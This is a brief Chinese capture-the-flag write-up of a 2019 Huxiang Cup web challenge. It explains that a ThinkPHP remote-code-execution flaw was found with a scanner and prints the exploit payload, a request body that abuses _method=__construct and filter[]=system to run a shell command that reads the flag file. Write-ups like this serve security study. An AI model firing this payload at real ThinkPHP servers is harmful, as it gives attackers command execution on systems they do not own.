点击此处获得更好的阅读体验
题目考点
- ThinkPHP RCE漏洞
解题思路
直接使用Lucifer师傅的TPscan扫到漏洞,然后使用EXP直接RCE
_method=__construct&filter[]=system&server[REQUEST_METHOD]=cat /flag
thinkphp
- 本文链接: https://writeup.ctfhub.com/Challenge/2019/湖湘杯/Web/vRbmRuDSUCy3f5ov9HP7Rm.html
- 版权声明: 本博客所有文章除特别声明外,均采用 BY-NC-SA 许可协议。转载请注明出处!